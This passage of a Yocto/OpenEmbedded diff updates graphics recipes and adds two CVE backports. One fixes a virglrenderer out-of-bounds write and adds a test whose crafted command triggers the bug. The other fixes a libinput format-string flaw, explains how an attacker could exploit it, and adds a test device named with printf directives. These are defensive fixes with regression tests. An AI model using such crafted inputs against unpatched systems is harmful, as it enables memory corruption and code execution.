9 file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \ 11 file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
12 file://0001-Add-a-missing-include-for-htobe32-definition.patch \
13 file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \
14 file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \
15 file://0001-serializer.py-make-.gz-files-reproducible.patch \
16 file://0001-framework-profile.py-make-test-lists-reproducible.patch \
17 file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \
10 " 18 "
11UPSTREAM_CHECK_COMMITS = "1" 19UPSTREAM_CHECK_COMMITS = "1"
12 20
13SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813" 21SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985"
14# (when PV goes above 1.0 remove the trailing r) 22# (when PV goes above 1.0 remove the trailing r)
15PV = "1.0+gitr${SRCPV}" 23PV = "1.0+gitr${SRCPV}"
16 24
@@ -35,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/"
35PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}" 43PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}"
36PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut," 44PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut,"
37PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}" 45PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}"
46PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader"
38 47
48export PIGLIT_BUILD_DIR = "../../../../git"
39 49
40do_configure_prepend() { 50do_configure_prepend() {
41 if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then 51 if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then
diff --git a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
index d10bddb529..f69e4838f4 100644
--- a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
+++ b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
@@ -1,6 +1,9 @@
1SUMMARY = "Enables monitoring and display of application startup" 1SUMMARY = "Enables monitoring and display of application startup"
2DESCRIPTION = "Contains a reference implementation of the startup notification protocol. \
3The reference implementation is mostly under an X Window System style license, and has \
4no special dependencies. "
2HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/" 5HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/"
3BUGTRACKER = "https://bugs.freedesktop.org/enter_bug.cgi?product=Specifications" 6BUGTRACKER = "https://gitlab.freedesktop.org/xdg/startup-notification/-/issues"
4 7
5# most files are under MIT, but libsn/sn-util.c is under LGPL, the 8# most files are under MIT, but libsn/sn-util.c is under LGPL, the
6# effective license is LGPL 9# effective license is LGPL
diff --git a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
index 3e1ba196b5..b75bd4c51d 100644
--- a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
+++ b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
@@ -1,4 +1,5 @@
1SUMMARY = "The Bitstream Vera fonts - TTF Edition" 1SUMMARY = "The Bitstream Vera fonts - TTF Edition"
2HOMEPAGE = "https://www.gnome.org/fonts/"
2DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \ 3DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \
3faces (normal, oblique, bold, bold oblique) and two serif faces (normal \ 4faces (normal, oblique, bold, bold oblique) and two serif faces (normal \
4and bold). In addition Fontconfig/Xft2 can artificially oblique the \ 5and bold). In addition Fontconfig/Xft2 can artificially oblique the \
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
new file mode 100644
index 0000000000..4a277bd4d0
--- /dev/null
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
@@ -0,0 +1,100 @@
1From 95e581fd181b213c2ed7cdc63f2abc03eaaa77ec Mon Sep 17 00:00:00 2001
2From: Gert Wollny <gert.wollny@collabora.com>
3Date: Tue, 30 Nov 2021 10:17:26 +0100
4Subject: [PATCH] vrend: Add test to resource OOB write and fix it
5
6v2: Also check that no depth != 1 has been send when none is due
7
8Closes: #250
9Signed-off-by: Gert Wollny <gert.wollny@collabora.com>
10Reviewed-by: Chia-I Wu <olvaffe@gmail.com>
11
12https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/95e581fd181b213c2ed7cdc63f2abc03eaaa77ec
13Upstream-Status: Backport
14CVE: CVE-2022-0135
15Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
16---
17 src/vrend_renderer.c | 3 +++
18 tests/test_fuzzer_formats.c | 43 +++++++++++++++++++++++++++++++++++++
19 2 files changed, 46 insertions(+)
20
21diff --git a/src/vrend_renderer.c b/src/vrend_renderer.c
22index 28f669727..357b81b20 100644
23--- a/src/vrend_renderer.c
24+++ b/src/vrend_renderer.c
25@@ -7833,8 +7833,11 @@ static int vrend_renderer_transfer_write_iov(struct vrend_context *ctx,
26 info->box->height) * elsize;
27 if (res->target == GL_TEXTURE_3D ||
28 res->target == GL_TEXTURE_2D_ARRAY ||
29+ res->target == GL_TEXTURE_2D_MULTISAMPLE_ARRAY ||
30 res->target == GL_TEXTURE_CUBE_MAP_ARRAY)
31 send_size *= info->box->depth;
32+ else if (need_temp && info->box->depth != 1)
33+ return EINVAL;
34
35 if (need_temp) {
36 data = malloc(send_size);
37diff --git a/tests/test_fuzzer_formats.c b/tests/test_fuzzer_formats.c
38index 59d6fb671..2de9a9a3f 100644
39--- a/tests/test_fuzzer_formats.c
40+++ b/tests/test_fuzzer_formats.c
41@@ -957,6 +957,48 @@ static void test_vrend_set_signle_abo_heap_overflow() {
42 virgl_renderer_submit_cmd((void *) cmd, ctx_id, 0xde);
43 }
44
45+/* Test adapted from yaojun8558363@gmail.com:
46+ * https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/250
47+*/
48+static void test_vrend_3d_resource_overflow() {
49+
50+ struct virgl_renderer_resource_create_args resource;
51+ resource.handle = 0x4c474572;
52+ resource.target = PIPE_TEXTURE_2D_ARRAY;
53+ resource.format = VIRGL_FORMAT_Z24X8_UNORM;
54+ resource.nr_samples = 2;
55+ resource.last_level = 0;
56+ resource.array_size = 3;
57+ resource.bind = VIRGL_BIND_SAMPLER_VIEW;
58+ resource.depth = 1;
59+ resource.width = 8;
60+ resource.height = 4;
61+ resource.flags = 0;
62+
63+ virgl_renderer_resource_create(&resource, NULL, 0);
64+ virgl_renderer_ctx_attach_resource(ctx_id, resource.handle);
65+
66+ uint32_t size = 0x400;
67+ uint32_t cmd[size];
68+ int i = 0;
69+ cmd[i++] = (size - 1) << 16 | 0 << 8 | VIRGL_CCMD_RESOURCE_INLINE_WRITE;
70+ cmd[i++] = resource.handle;
71+ cmd[i++] = 0; // level
72+ cmd[i++] = 0; // usage
73+ cmd[i++] = 0; // stride
74+ cmd[i++] = 0; // layer_stride
75+ cmd[i++] = 0; // x
76+ cmd[i++] = 0; // y
77+ cmd[i++] = 0; // z
78+ cmd[i++] = 8; // w
79+ cmd[i++] = 4; // h
80+ cmd[i++] = 3; // d
81+ memset(&cmd[i], 0, size - i);
82+
83+ virgl_renderer_submit_cmd((void *) cmd, ctx_id, size);
84+}
85+
86+
87 int main()
88 {
89 initialize_environment();
90@@ -979,6 +1021,7 @@ int main()
91 test_cs_nullpointer_deference();
92 test_vrend_set_signle_abo_heap_overflow();
93
94+ test_vrend_3d_resource_overflow();
95
96 virgl_renderer_context_destroy(ctx_id);
97 virgl_renderer_cleanup(&cookie);
98--
99GitLab
100
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 1046b8504f..8185d6f7e8 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,9 +10,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
10 10
11DEPENDS = "libdrm mesa libepoxy" 11DEPENDS = "libdrm mesa libepoxy"
12SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985" 12SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
13SRC_URI = "git://anongit.freedesktop.org/virglrenderer \ 13SRC_URI = "git://anongit.freedesktop.org/git/virglrenderer;branch=master \
14 file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \ 14 file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
15 file://0001-meson.build-use-python3-directly-for-python.patch \ 15 file://0001-meson.build-use-python3-directly-for-python.patch \
16 file://CVE-2022-0135.patch \
16 " 17 "
17 18
18S = "${WORKDIR}/git" 19S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64d..0774f37e31 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
8 8
9DEPENDS = "zlib" 9DEPENDS = "zlib"
10 10
11SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \ 11SRC_URI = "git://github.com/assimp/assimp.git;nobranch=1;protocol=https \
12 file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \ 12 file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
13 file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \ 13 file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
14 " 14 "
diff --git a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
index c94e768b52..b212814759 100644
--- a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \
8SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf" 8SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf"
9SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd" 9SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd"
10 10
11SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \ 11SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \
12 git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \ 12 git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \
13 git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \ 13 git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \
14 file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \ 14 file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \
15 " 15 "
16UPSTREAM_CHECK_COMMITS = "1" 16UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
index 72c29a72a2..c58a801e03 100644
--- a/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb
@@ -1,11 +1,15 @@
1SUMMARY = "Vulkan Header files and API registry" 1SUMMARY = "Vulkan Header files and API registry"
2DESCRIPTION = "Vulkan is a 3D graphics and compute API providing cross-platform access \
3to modern GPUs with low overhead and targeting realtime graphics applications such as \
4games and interactive media. This package contains the development headers \
5for packages wanting to make use of Vulkan."
2HOMEPAGE = "https://www.khronos.org/vulkan/" 6HOMEPAGE = "https://www.khronos.org/vulkan/"
3BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers" 7BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Headers"
4SECTION = "libs" 8SECTION = "libs"
5 9
6LICENSE = "Apache-2.0" 10LICENSE = "Apache-2.0"
7LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" 11LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
8SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126" 12SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https"
9 13
10SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84" 14SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84"
11 15
diff --git a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
index 504cf85a2b..c8352bf31d 100644
--- a/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb
@@ -9,7 +9,7 @@ SECTION = "libs"
9 9
10LICENSE = "Apache-2.0" 10LICENSE = "Apache-2.0"
11LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac" 11LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac"
12SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126" 12SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https"
13SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed" 13SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed"
14 14
15S = "${WORKDIR}/git" 15S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
index 2fd61c989a..ec65f11952 100644
--- a/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb
@@ -1,11 +1,12 @@
1SUMMARY = "Vulkan Utilities and Tools" 1SUMMARY = "Vulkan Utilities and Tools"
2DESCRIPTION = "Assist development by enabling developers to verify their applications correct use of the Vulkan API."
2HOMEPAGE = "https://www.khronos.org/vulkan/" 3HOMEPAGE = "https://www.khronos.org/vulkan/"
3BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools" 4BUGTRACKER = "https://github.com/KhronosGroup/Vulkan-Tools"
4SECTION = "libs" 5SECTION = "libs"
5 6
6LICENSE = "Apache-2.0" 7LICENSE = "Apache-2.0"
7LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" 8LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57"
8SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126" 9SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https"
9SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0" 10SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0"
10 11
11S = "${WORKDIR}/git" 12S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
index a620295978..f0dc780ca1 100644
--- a/meta/recipes-graphics/waffle/waffle_1.6.0.bb
+++ b/meta/recipes-graphics/waffle/waffle_1.6.0.bb
@@ -1,13 +1,21 @@
1SUMMARY = "cross-platform C library to defer selection of GL API and of window system" 1SUMMARY = "A C library for selecting an OpenGL API and window system at runtime"
2DESCRIPTION = "A cross-platform C library that allows one to defer selection \
3of an OpenGL API and window system until runtime. For example, on Linux, Waffle \
4enables an application to select X11/EGL with an OpenGL 3.3 core profile, \
5Wayland with OpenGL ES2, and other window system / API combinations."
6HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle"
7BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle"
2LICENSE = "BSD-2-Clause" 8LICENSE = "BSD-2-Clause"
3LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \ 9LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \
4 file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf" 10 file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf"
5 11
6SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz" 12SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2"
7SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7" 13SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942"
8SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7" 14SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb"
9 15
10UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html" 16S = "${WORKDIR}/${BPN}-v${PV}"
17
18UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases"
11 19
12inherit meson features_check lib_package bash-completion 20inherit meson features_check lib_package bash-completion
13 21
diff --git a/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
new file mode 100644
index 0000000000..313c0c5eb2
--- /dev/null
+++ b/meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch
@@ -0,0 +1,360 @@
1From 2a8b8fde90d63d48ce09ddae44142674bbca1c28 Mon Sep 17 00:00:00 2001
2From: Peter Hutterer <peter.hutterer@who-t.net>
3Date: Wed, 30 Mar 2022 09:25:22 +1000
4Subject: [PATCH] evdev: strip the device name of format directives
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This fixes a format string vulnerabilty.
10
11evdev_log_message() composes a format string consisting of a fixed
12prefix (including the rendered device name) and the passed-in format
13buffer. This format string is then passed with the arguments to the
14actual log handler, which usually and eventually ends up being printf.
15
16If the device name contains a printf-style format directive, these ended
17up in the format string and thus get interpreted correctly, e.g. for a
18device "Foo%sBar" the log message vs printf invocation ends up being:
19 evdev_log_message(device, "some message %s", "some argument");
20 printf("event9 - Foo%sBar: some message %s", "some argument");
21
22This can enable an attacker to execute malicious code with the
23privileges of the process using libinput.
24
25To exploit this, an attacker needs to be able to create a kernel device
26with a malicious name, e.g. through /dev/uinput or a Bluetooth device.
27
28To fix this, convert any potential format directives in the device name
29by duplicating percentages.
30
31Pre-rendering the device to avoid the issue altogether would be nicer
32but the current log level hooks do not easily allow for this. The device
33name is the only user-controlled part of the format string.
34
35A second potential issue is the sysname of the device which is also
36sanitized.
37
38This issue was found by Albin Eldstål-Ahrens and Benjamin Svensson from
39Assured AB, and independently by Lukas Lamster.
40
41Fixes #752
42
43Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
44(cherry picked from commit a423d7d3269dc32a87384f79e29bb5ac021c83d1)
45
46CVE: CVE-2022-1215
47Upstream Status: Backport [https://gitlab.freedesktop.org/libinput/libinput/-/commit/2a8b8fde90d63d48ce09ddae44142674bbca1c28]
48Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
49
50---
51 meson.build | 1 +
52 src/evdev.c | 31 +++++++++++------
53 src/evdev.h | 6 ++--
54 src/util-strings.h | 30 ++++++++++++++++
55 test/litest-device-format-string.c | 56 ++++++++++++++++++++++++++++++
56 test/litest.h | 1 +
57 test/test-utils.c | 26 ++++++++++++++
58 7 files changed, 139 insertions(+), 12 deletions(-)
59 create mode 100644 test/litest-device-format-string.c
60
61diff --git a/meson.build b/meson.build
62index 90f528e6..1f6159e7 100644
63--- a/meson.build
64+++ b/meson.build
65@@ -787,6 +787,7 @@
66 'test/litest-device-dell-canvas-totem-touch.c',
67 'test/litest-device-elantech-touchpad.c',
68 'test/litest-device-elan-tablet.c',
69+ 'test/litest-device-format-string.c',
70 'test/litest-device-generic-singletouch.c',
71 'test/litest-device-gpio-keys.c',
72 'test/litest-device-huion-pentablet.c',
73diff --git a/src/evdev.c b/src/evdev.c
74index 6d81f58f..d1c35c07 100644
75--- a/src/evdev.c
76+++ b/src/evdev.c
77@@ -2356,19 +2356,19 @@ evdev_device_create(struct libinput_seat *seat,
78 struct libinput *libinput = seat->libinput;
79 struct evdev_device *device = NULL;
80 int rc;
81- int fd;
82+ int fd = -1;
83 int unhandled_device = 0;
84 const char *devnode = udev_device_get_devnode(udev_device);
85- const char *sysname = udev_device_get_sysname(udev_device);
86+ char *sysname = str_sanitize(udev_device_get_sysname(udev_device));
87
88 if (!devnode) {
89 log_info(libinput, "%s: no device node associated\n", sysname);
90- return NULL;
91+ goto err;
92 }
93
94 if (udev_device_should_be_ignored(udev_device)) {
95 log_debug(libinput, "%s: device is ignored\n", sysname);
96- return NULL;
97+ goto err;
98 }
99
100 /* Use non-blocking mode so that we can loop on read on
101@@ -2382,13 +2382,15 @@ evdev_device_create(struct libinput_seat *seat,
102 sysname,
103 devnode,
104 strerror(-fd));
105- return NULL;
106+ goto err;
107 }
108
109 if (!evdev_device_have_same_syspath(udev_device, fd))
110 goto err;
111
112 device = zalloc(sizeof *device);
113+ device->sysname = sysname;
114+ sysname = NULL;
115
116 libinput_device_init(&device->base, seat);
117 libinput_seat_ref(seat);
118@@ -2411,6 +2413,9 @@ evdev_device_create(struct libinput_seat *seat,
119 device->dispatch = NULL;
120 device->fd = fd;
121 device->devname = libevdev_get_name(device->evdev);
122+ /* the log_prefix_name is used as part of a printf format string and
123+ * must not contain % directives, see evdev_log_msg */
124+ device->log_prefix_name = str_sanitize(device->devname);
125 device->scroll.threshold = 5.0; /* Default may be overridden */
126 device->scroll.direction_lock_threshold = 5.0; /* Default may be overridden */
127 device->scroll.direction = 0;
128@@ -2238,9 +2238,14 @@
129 return device;
130
131 err:
132- close_restricted(libinput, fd);
133- if (device)
134- evdev_device_destroy(device);
135+ if (fd >= 0) {
136+ close_restricted(libinput, fd);
137+ if (device) {
138+ unhandled_device = device->seat_caps == 0;
139+ evdev_device_destroy(device);
140+ }
141+ }
142+ free(sysname);
143
144 return unhandled_device ? EVDEV_UNHANDLED_DEVICE : NULL;
145 }
146@@ -2469,7 +2478,7 @@ evdev_device_get_output(struct evdev_device *device)
147 const char *
148 evdev_device_get_sysname(struct evdev_device *device)
149 {
150- return udev_device_get_sysname(device->udev_device);
151+ return device->sysname;
152 }
153
154 const char *
155@@ -3066,6 +3075,8 @@ evdev_device_destroy(struct evdev_device *device)
156 if (device->base.group)
157 libinput_device_group_unref(device->base.group);
158
159+ free(device->log_prefix_name);
160+ free(device->sysname);
161 free(device->output_name);
162 filter_destroy(device->pointer.filter);
163 libinput_timer_destroy(&device->scroll.timer);
164diff --git a/src/evdev.h b/src/evdev.h
165index c7d130f8..980c5943 100644
166--- a/src/evdev.h
167+++ b/src/evdev.h
168@@ -169,6 +169,8 @@ struct evdev_device {
169 struct udev_device *udev_device;
170 char *output_name;
171 const char *devname;
172+ char *log_prefix_name;
173+ char *sysname;
174 bool was_removed;
175 int fd;
176 enum evdev_device_seat_capability seat_caps;
177@@ -786,7 +788,7 @@ evdev_log_msg(struct evdev_device *device,
178 sizeof(buf),
179 "%-7s - %s%s%s",
180 evdev_device_get_sysname(device),
181- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
182+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
183 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
184 format);
185
186@@ -824,7 +826,7 @@ evdev_log_msg_ratelimit(struct evdev_device *device,
187 sizeof(buf),
188 "%-7s - %s%s%s",
189 evdev_device_get_sysname(device),
190- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
191+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
192 (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
193 format);
194
195diff --git a/src/util-strings.h b/src/util-strings.h
196index 2a15fab3..d5a84146 100644
197--- a/src/util-strings.h
198+++ b/src/util-strings.h
199@@ -42,6 +42,7 @@
200 #ifdef HAVE_XLOCALE_H
201 #include <xlocale.h>
202 #endif
203+#include "util-macros.h"
204
205 #define streq(s1, s2) (strcmp((s1), (s2)) == 0)
206 #define strneq(s1, s2, n) (strncmp((s1), (s2), (n)) == 0)
207@@ -312,3 +313,31 @@
208 free(result);
209 return -1;
210 }
211+
212+/**
213+ * Return a copy of str with all % converted to %% to make the string
214+ * acceptable as printf format.
215+ */
216+static inline char *
217+str_sanitize(const char *str)
218+{
219+ if (!str)
220+ return NULL;
221+
222+ if (!strchr(str, '%'))
223+ return strdup(str);
224+
225+ size_t slen = min(strlen(str), 512);
226+ char *sanitized = zalloc(2 * slen + 1);
227+ const char *src = str;
228+ char *dst = sanitized;
229+
230+ for (size_t i = 0; i < slen; i++) {
231+ if (*src == '%')
232+ *dst++ = '%';
233+ *dst++ = *src++;
234+ }
235+ *dst = '\0';
236+
237+ return sanitized;
238+}
239diff --git a/test/litest-device-format-string.c b/test/litest-device-format-string.c
240new file mode 100644
241index 00000000..aed15db4
242--- /dev/null
243+++ b/test/litest-device-format-string.c
244@@ -0,0 +1,56 @@
245+
246+/*
247+ * Copyright © 2013 Red Hat, Inc.
248+ *
249+ * Permission is hereby granted, free of charge, to any person obtaining a
250+ * copy of this software and associated documentation files (the "Software"),
251+ * to deal in the Software without restriction, including without limitation
252+ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
253+ * and/or sell copies of the Software, and to permit persons to whom the
254+ * Software is furnished to do so, subject to the following conditions:
255+ *
256+ * The above copyright notice and this permission notice (including the next
257+ * paragraph) shall be included in all copies or substantial portions of the
258+ * Software.
259+ *
260+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
261+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
262+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
263+ * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
264+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
265+ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
266+ * DEALINGS IN THE SOFTWARE.
267+ */
268+
269+#include "config.h"
270+
271+#include "litest.h"
272+#include "litest-int.h"
273+
274+static struct input_id input_id = {
275+ .bustype = 0x3,
276+ .vendor = 0x0123,
277+ .product = 0x0456,
278+};
279+
280+static int events[] = {
281+ EV_KEY, BTN_LEFT,
282+ EV_KEY, BTN_RIGHT,
283+ EV_KEY, BTN_MIDDLE,
284+ EV_REL, REL_X,
285+ EV_REL, REL_Y,
286+ EV_REL, REL_WHEEL,
287+ EV_REL, REL_WHEEL_HI_RES,
288+ -1 , -1,
289+};
290+
291+TEST_DEVICE("mouse-format-string",
292+ .type = LITEST_MOUSE_FORMAT_STRING,
293+ .features = LITEST_RELATIVE | LITEST_BUTTON | LITEST_WHEEL,
294+ .interface = NULL,
295+
296+ .name = "Evil %s %d %x Mouse %p %",
297+ .id = &input_id,
298+ .absinfo = NULL,
299+ .events = events,
300+)
301diff --git a/test/litest.h b/test/litest.h
302index 4982e516..1b1daa90 100644
303--- a/test/litest.h
304+++ b/test/litest.h
305@@ -303,6 +303,7 @@
306 LITEST_ALPS_3FG,
307 LITEST_ELAN_TABLET,
308 LITEST_ABSINFO_OVERRIDE,
309+ LITEST_MOUSE_FORMAT_STRING,
310 };
311
312 #define LITEST_DEVICELESS -2
313diff --git a/test/test-utils.c b/test/test-utils.c
314index 989adecd..e80754be 100644
315--- a/test/test-utils.c
316+++ b/test/test-utils.c
317@@ -1267,6 +1267,31 @@ START_TEST(strstartswith_test)
318 }
319 END_TEST
320
321+START_TEST(strsanitize_test)
322+{
323+ struct strsanitize_test {
324+ const char *string;
325+ const char *expected;
326+ } tests[] = {
